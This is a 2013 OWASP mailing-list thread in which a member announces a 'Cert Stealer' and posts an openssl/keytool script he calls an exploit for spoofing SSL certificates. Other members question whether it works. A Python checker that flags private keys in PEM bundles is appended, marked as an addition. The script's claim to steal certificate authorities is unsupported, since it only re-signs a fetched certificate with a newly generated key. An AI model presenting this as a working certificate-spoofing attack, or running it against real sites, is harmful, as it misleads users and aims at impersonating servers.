[Owasp-leaders] Cert Stealer Released

Abbas Naderi abbas.naderi at owasp.org
Thu Dec 26 19:40:48 UTC 2013


Maybe the PEM you’re using is not a cert, but a private key. They are both encoded into PEM files. If you have the private key, then you don’t need to exploit it! You already have it.

And BTW, what's the practical use of this? I mean, have you used it anywhere? How can it be used to exploit something?
-A
On Dec 26, 2013, at 2:38 PM, Gregory Disney <gregory.disney at owasp.org> wrote:

> openssl s_client -showcerts -connect $host:$port > $keyring.pem; 
> openssl x509 -in $keyring.pem  -pubkey > $keyring.cer;
> keytool -keystore $ks --importcert --alias $keyring.pem -file $keyring.pem -storepass $passwd -noprompt;
> keytool -genkey -alias $keyring.key -keyalg RSA -keystore $ks -storepass $passwd -noprompt
> keytool -v -importkeystore -srckeystore $ks -srcalias $keyring.key -destkeystore $keyring.p12 -file $keyring.p12 -deststoretype PKCS12 -storepass $passwd -noprompt
> openssl pkcs12 -in $keyring.p12 -out $keyring.key -passin pass:$passwd
> echo "Stealing CA"
> cat $keyring.key >> $keyring.pem
> openssl x509 -inform pem -in $keyring.pem -out ca-$keyring.crt -signkey $keyring.key -CA $keyring.key -CAcreateserial 
> 
> This is exactly how I do it. They are checking for public key and private key; I'm not sure why openssl lets you resign as a key. But here is the source for the exploit.
> 
> On 12/26/13, 11:35 AM, Abbas Naderi wrote:
>> I didn’t quite understand. What does the encoding vulnerability expose? SSL certs are public-keys plus a bunch of other data. There is no private key inside to extract and resign another certificate with.
>> -A
>> On Dec 26, 2013, at 2:32 PM, Gregory Disney <gregory.disney at owasp.org> wrote:
>> 
>>> I think a fair description would be it simplifies spoofing certs. This started out as a proof of concept a year ago when I realized there was a vulnerability in PEM encoding of SSL certs, so I chain-loaded a Java keystore which was converted to a key, then resigned the cert with the chain-loaded key, thus keeping the context of the original certificate with a hijacked authority.
>>> On 12/26/13, 11:21 AM, Abbas Naderi wrote:
>>>> Well a description of what this does would be a good idea to start with…
>>>> -A
>>>> On Dec 26, 2013, at 2:18 PM, Gregory Disney <gregory.disney at owasp.org> wrote:
>>>> 
>>>>> I'm working on the documentation. It works by turning a keytool PKCS12 into an openssl key, then embedding the key in the root CA and resigning with the embedded key.
>>>>> On 12/26/13, 10:47 AM, Dinis Cruz wrote:
>>>>>> Hi Gregory, where can I find the details of how this works?
>>>>>> 
>>>>>> Thx
>>>>>> 
>>>>>> Dinis
>>>>>> 
>>>>>> On 26 Dec 2013 07:44, "Gregory Disney" <gregory.disney at owasp.org> wrote:
>>>>>> Screen shot of successfully spoofed certs:
>>>>>> http://image-store.slidesharecdn.com/f6ff3390-6dfc-11e3-8ed6-22000a9193db-original.png
>>>>>> Each of these certs has been tested and is capable of creating SSL sessions.
>>>>>> Cert Stealer:
>>>>>> https://gist.github.com/gdisneyleugers/8129304
>>>>>> -Greg
>>>>>> _______________________________________________
>>>>>> OWASP-Leaders mailing list
>>>>>> OWASP-Leaders at lists.owasp.org
>>>>>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
> 
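A defender's check for the point raised above (a PEM file can hold either a certificate or a private key, and the quoted script appends one to the other): this added example, not code from the thread or the gist, classifies each block of a PEM bundle and flags private-key material. It uses only the standard library, and its sample bundle is constructed from dummy DER blobs, not real certificates or keys.

```python
"""Classify the blocks of a PEM bundle and flag private-key material. Added example,
not from the thread; stdlib only. The sample bundle is constructed dummy DER, not real certs."""
import base64
import binascii
import re

PEM_BLOCK = re.compile(r"-----BEGIN ([A-Z0-9 ]+)-----\s*(.*?)\s*-----END \1-----", re.S)
PRIVATE_LABELS = {"PRIVATE KEY", "RSA PRIVATE KEY", "EC PRIVATE KEY",
                  "DSA PRIVATE KEY", "ENCRYPTED PRIVATE KEY"}
# Constructed sample: s_client-style chatter, a dummy "certificate" whose DER is a
# well-formed SEQUENCE (30 03 02 01 05), and a dummy key whose DER declares 5 content
# bytes but carries only 3 (truncated, as a damaged export would be).
SAMPLE_BUNDLE = """\
CONNECTED(00000003) ... non-PEM text that the parser ignores
-----BEGIN CERTIFICATE-----
MAMCAQU=
-----END CERTIFICATE-----
-----BEGIN RSA PRIVATE KEY-----
MAUCAQU=
-----END RSA PRIVATE KEY-----
"""

def der_outer_length(der: bytes) -> int:
    """Total bytes the outermost DER SEQUENCE (tag 0x30) claims to occupy."""
    if len(der) < 2 or der[0] != 0x30:
        raise ValueError("not a DER SEQUENCE")
    first = der[1]
    if first < 0x80:                      # short form: length fits in one byte
        return 2 + first
    n = first & 0x7F                      # long form: next n bytes hold the length
    return 2 + n + int.from_bytes(der[2:2 + n], "big")

def classify_pem(text: str) -> list:
    """One record per block: label, kind, decoded size, whether the DER is intact."""
    records = []
    for match in PEM_BLOCK.finditer(text):
        label, body = match.group(1), match.group(2)
        try:
            der = base64.b64decode(re.sub(r"\s+", "", body), validate=True)
            intact = der_outer_length(der) == len(der)
        except (ValueError, binascii.Error):   # bad base64, or not a SEQUENCE
            der, intact = b"", False
        kind = ("private-key" if label in PRIVATE_LABELS else
                "certificate" if label in ("CERTIFICATE", "TRUSTED CERTIFICATE") else "other")
        records.append({"label": label, "kind": kind, "der_len": len(der), "intact": intact})
    return records

def contains_private_key(text: str) -> bool:
    """True if any block in the bundle is private-key material."""
    return any(r["kind"] == "private-key" for r in classify_pem(text))
```

Run `classify_pem` over the output of `openssl s_client -showcerts` before handing the file to keytool, and treat any `private-key` record in a file meant to hold only certificates as a finding.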
